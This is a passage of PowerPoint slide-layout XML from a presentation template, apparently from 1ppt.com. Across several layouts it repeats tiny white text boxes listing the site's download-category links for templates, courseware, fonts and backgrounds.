              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout183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83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83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83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8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84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84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84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84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84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84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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout184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84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84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84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8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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout185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85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85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85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85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85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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
